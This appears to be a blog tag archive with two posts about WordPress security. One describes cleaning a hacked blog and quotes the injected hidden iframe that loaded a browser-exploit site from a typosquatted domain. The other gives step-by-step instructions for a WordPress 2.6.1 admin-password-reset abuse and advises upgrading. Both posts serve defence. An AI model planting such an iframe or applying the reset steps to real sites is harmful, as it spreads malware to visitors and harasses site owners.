Tag Archives: hack

Help, my WordPress blog is giving a virus warning!

Posted on by
2

I got called in to resolve an issue on a WordPress blog today. On the surface it looked as if the administration side of the site had broken, but the real cause turned out to be much darker than that.

Looking at the source of the page, I could see that lines were being inserted on all pages that tried to open an iFrame onto a website that used a browser exploit to try and install a virus on your computer. If my browser wasn’t patched and I wasn’t using a virus scanner, it could have been a ton of work for me to clean up. The question was, where was that iFrame coming from?

Turns out that a couple (4 actually) of WordPress files had got compromised and had extra lines added to them to open this iFrame. The files were:

  • wp-feed.php
  • wp-blog-header.php
  • wp-config.php
  • wp-load.php

This was the extra line:

<iframe src="http://google-analitics.ws/out.php?s_id=1" width="0" height="0" frameborder="0"></iframe>

These files are used in every WordPress page load and were the cause of the extra iFrame. The big question was how the files got compromised in the first place. They were set to the correct permissions, so could only have been changed by someone (or a script) with root access to the server. Unforuntately this is not something you can protect against. Almost make sure your blog is living on a reliable host and remember, “It’s wilder than Las Vegas out there”

WordPress 2.6.1 Exploit: Upgrade to avoid hack

Posted on by
Reply

I was reading around today after cleaning up a website that got hacked when I saw an example of a vulnerability that exists in WordPress 2.6.1 The security hole is this:

Imagine a blog site using wordpress 2.6.1 and its web address is www.hackme.com , when you type in your address bar http://www.hackme.com/wp-login.php?action=register the new user registration page comes up !

After that we type our user name as “admin                                                       x” (make sure there are 52 space characters between “x” and “admin”. So after that type your e-mail address to the next textbox and click register. By doing this we are cloning the “admin” user name. Your password will come to your e-mail address shortly. You will not able to login with this information directly, So open the same page again and click “forgot password”, type in your own e-mail address and your will receive the link to reset the admin password. Once you click the reset link, the new password will be generated and will be sent to the real owner of the website.

Now, although people can’t log in with that password, it can prove to be very annoying and can even be used to implement a denial-of-service attack, but continually changing the admin’s password. How can you address the issue. Either upgrade to WordPress 2.6.2 or disable user registrations.